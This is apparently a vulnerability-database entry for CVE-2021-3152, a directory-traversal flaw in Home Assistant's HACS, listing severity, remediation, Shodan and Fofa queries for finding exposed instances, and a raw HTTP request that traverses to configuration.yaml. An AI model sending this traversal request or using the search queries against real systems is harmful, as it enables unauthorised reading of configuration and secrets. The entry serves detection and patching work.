🔙 목록으로 돌아가기

CVE-2021-3152: Home Assistant HACS - Local File Inclusion

TitleHome Assistant HACS - Local File Inclusion
AuthorDhiyaneshDk
SeverityHigh
ImpactAttackers can access sensitive files on the system, potentially leading to information disclosure or further system compromise.
RemediationUpdate to version 2021.1.3 or later to include protection against directory traversal in custom integrations.
CVSS Score7.5
EPSS Score0.27878
CVE IDCVE-2021-3152
CWE IDCWE-22
Shodan Querytitle:"Home Assistant"
Fofa Querytitle="Home Assistant"
Tags cve cve2021 hacs homeassistant lfi

🔍 Vulnerability Description

Home Assistant before 2021.1.3 lacks a protection layer against directory-traversal attacks in custom integrations, letting attackers access arbitrary files, exploit requires attacker to deploy malicious custom integration.

🌐 HTTP Request

GET /hacsfiles/../../configuration.yaml HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_2; es-es) AppleWebKit/525.13 (KHTML, like Gecko) Version/3.1 Safari/525.13
Connection: close
Accept-Encoding: gzip

📚 References


🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2021/CVE-2021-3152.yaml

🦈 Packet Capture: ⬇️ Download cve-2021-3152.pcap

⚠️ Notice: These rules are for detection purposes. Please tune them before applying to a production environment.
Snort 2 Rule
N/A
Snort 3 Rule
N/A